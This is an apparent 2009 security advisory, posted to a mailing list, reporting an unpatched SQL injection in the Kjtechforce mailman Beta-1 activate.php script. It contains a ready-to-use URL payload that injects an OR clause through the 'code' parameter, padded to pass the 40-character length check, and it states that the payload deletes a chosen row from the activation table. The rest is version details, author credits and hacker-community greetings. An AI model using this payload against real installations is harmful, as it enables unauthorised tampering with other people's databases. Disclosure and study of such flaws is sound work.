SQL INJECTION VULNERABILITY--Kjtechforce mailman Beta-1-->

Fri, 05 Jun 2009 14:09:48 -0700 

------------------------------------------------------------

SQL INJECTION VULNERABILITY--Kjtechforce mailman Beta-1-->

------------------------------------------------------------



CMS INFORMATION:



-->WEB: http://sourceforge.net/projects/kjtechforce/

-->DOWNLOAD: http://sourceforge.net/projects/kjtechforce/

-->DEMO: N/A

-->CATEGORY: CMS / Mailer

-->DESCRIPTION: The kjtechforce project has aimed at the tool making

        that supports kjclub.com from the outside...

-->RELEASED: 2009-05-16



CMS VULNERABILITY:



-->TESTED ON: firefox 3

-->DORK: N/A

-->CATEGORY: SQL INJECTION

-->AFFECT VERSION: CURRENT

-->Discovered Bug date: 2009-06-02

-->Reported Bug date: 2009-06-02

-->Fixed bug date: Not fixed

-->Info patch: Not fixed

-->Author: YEnH4ckEr

-->mail: y3nh4ck3r[at]gmail[dot]com

-->WEB/BLOG: N/A

-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su 
apoyo.

-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)







#########################

////////////////////////



SQL INJECTION (SQLi):



////////////////////////

#########################







<<<<---------++++++++++++++ Condition: magic quotes=OFF 
+++++++++++++++++--------->>>>







[++] GET var --> 'code'



[++] File vuln --> 'activate.php'



[++] Note --> Code must be 40 characters long







~~~~~> 
http://[HOST]/[PATH]/activate.php?code=1111111111111111111111111'+OR+user_id='2







[++[Return]++] ~~~~~> Delete row with id=2 from "mailman_activator" (included 
sha-1 code)







#######################################################################

#######################################################################

##*******************************************************************##

##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##

##*******************************************************************##

##-------------------------------------------------------------------##

##*******************************************************************##

##              GREETZ TO: SPANISH H4ck3Rs community!                ##

##*******************************************************************##

#######################################################################

#######################################################################

Reply via email to